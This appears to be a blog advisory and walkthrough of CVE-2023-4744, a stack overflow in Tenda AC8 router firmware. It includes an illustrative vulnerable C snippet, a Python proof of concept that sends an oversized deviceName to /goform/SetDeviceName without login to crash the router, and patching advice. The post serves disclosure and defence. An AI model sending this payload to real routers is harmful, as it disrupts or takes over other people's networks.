CVE-2023-4744 - Critical Buffer Overflow in Tenda AC8 Routers (16.03.34.06_cn_TDC01) – Exploit Analysis & Walkthrough

In late 2023, a serious vulnerability (CVE-2023-4744, VDB-238633) was found in Tenda AC8 routers running firmware 16.03.34.06_cn_TDC01. The bug is in the formSetDeviceName function and lets remote attackers crash the router or run their own code—no login needed.

This post covers how the bug works, shows proof-of-concept code, and explains the risks, with links to the sources that first disclosed the exploit.

What's the Problem?

A function called formSetDeviceName is responsible for handling requests that set the device's name. Unfortunately, it doesn't properly check how big the input is, causing a stack-based buffer overflow when too much data is sent. This means an attacker can send a crafted request and take control of the router.

CVE ID: CVE-2023-4744

- VDB ID: VDB-238633

Vulnerable code pattern

In the router firmware’s code for formSetDeviceName, user-supplied values are copied into a fixed-size buffer without size checking. For instance (based on analysis):

void formSetDeviceName(request) {
    char devicename[32];
    // ...
    strcpy(devicename, request->devicename); // No bounds checking!
    // ...
}

If the attacker sends a device name longer than 32 bytes, it will overwrite nearby memory—the classic stack buffer overflow.

Attack Scenario

The attacker only needs to send a specially crafted HTTP POST request to the /goform/SetDeviceName endpoint, providing an oversized deviceName parameter. No login or special rights are needed.

A sample exploit uses

- URL: http://[router_ip]/goform/SetDeviceName

Proof-of-Concept Exploit

Below is a simple Python exploit showing how to crash the device or potentially gain code execution. It sends a POST request with an oversized device name.

import requests

router_ip = "192.168..1"  # Replace with actual router IP

payload = "A" * 128  # Overflow the buffer (far above the 32 bytes expected)

url = f"http://{router_ip}/goform/SetDeviceName";
data = {
    "deviceName": payload
}

resp = requests.post(url, data=data)
print(f"Status: {resp.status_code}")
if resp.status_code == 200:
    print("Payload sent, router may crash or become unresponsive.")
else:
    print("Failed to send payload, check connection.")

Code Execution: Skilled attackers could craft payloads that let them run commands on the router.

- Network Takeover: Since routers control network traffic, this could let hackers surveil, redirect, or completely control your traffic.

Original Disclosure & References

- VulDB: VDB-238633
- Exploit Database Entry (in some cases, check if an up-to-date PoC is available)
- CVE Details – CVE-2023-4744
- Security Focus write-up

How to Protect Yourself

1. Update firmware: Check Tenda’s official site for firmware updates. If your model/region doesn’t have an update, demand a fix from support.
2. Restrict access: Keep the router’s management interface off the WAN. Use strong Wi-Fi and admin passwords.
3. Firewalls/Segmentation: Block untrusted network segments from reaching router management ports.

Conclusion

CVE-2023-4744 is easy to exploit and critical for home and small office users using Tenda AC8 routers on the affected firmware. If you run such a device, update it right away or consider replacing it if updates aren’t available. Attackers can remotely break into or crash networks by simply sending a long name value—don’t let yours be next.


Stay safe and always keep your devices patched!

Share this post to help others stay protected.

*This write-up is exclusive to this post and summarizes current public research and exploit details as of June 2024.*

Timeline

Published on: 09/04/2023 00:15:07 UTC
Last modified on: 11/07/2023 04:22:55 UTC